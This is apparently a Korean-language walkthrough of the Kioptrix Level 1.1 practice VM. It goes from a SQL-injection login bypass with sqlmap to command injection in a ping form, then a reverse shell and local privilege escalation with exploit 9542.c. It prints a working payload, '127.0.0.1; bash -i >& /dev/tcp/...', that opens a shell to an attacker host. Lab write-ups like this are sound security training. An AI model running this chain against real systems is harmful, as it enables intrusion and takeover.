kioptrix Level 1.1

 

ssh, http, rpcbind, ssl/http, ipp, mysql 서비스가 돌아가고있다.

 

 

openssh에 대한 취약점을 찾기위해 searchsploit을 사용했지만 사용가능한 poc는 없었다.

ssh username과 password가 있어야만 쓸 수 있었다.

 

다른 방법을 시도해보자

 

 

apache httpd에서도 특정 취약점이 없었다.

 

 

CUPS 서비스에 RCE를 시도했지만 로컬에서만 접속을 허용하게 해놓아서 익스에 실패했다.

 

그럼 웹 서버에 접속해서 어떤 내용이 있나 살펴보자

 

 

username과 password를 받고 원격 시스템에 접속을 할 수 있다.

 

sqlmap으로 인증을 우회할 수 있는지 확인해본다.

 

서버는 Post 형식으로 데이터를 받고, sqlmap을 기본으로 설정하면 level, risk 둘 다 1로 설정되어 실행이된다. 처음이 이렇게 했을 때 취약점이 발견되지 않았고,  level=5, risk=3으로 설정해 더 많은 sql 인젝션을 시도하도록 설정했더니 유효한 payload를 출력해줬다.

 

 

 

해당 값을 Username에 넣고 시도해보니 로그인 할 수 있었다.

 

다음 페이지에서는 ping을 보낼 수 있는 프로그램이 실행되고 있다.

 

 

command injection이 되나 확인해보고자 127.0.0.1; id를 입력했더니 id 명령도 잘 실행됐다.

이 점을 이용해 쉘을 획득할 것이다.

 

local에서 4444포트를 열고

 

127.0.0.1; bash -i >& /dev/tcp/192.168.100.130/4444 0>&1

입력을 주게되면

쉘을 획득할 수 있다.

 

여기서 이제 LPE를 수행해야한다.

 

 

쉘을 획득한 후 시스템 정보를 더 수집하기 위해 lsb_release로 CentOs 4.5버전이라는걸 확인했고, searchsploit으로 LPE 코드를 확인해봤다.

 

 

9542.c파일이 있었고, python으로 로컬 서버를 열어 kioptrix에서 9542 파일을 다운 받은 후 컴파일 해줬다.

 

컴파일 후 실행해주면 권한상승이 된다.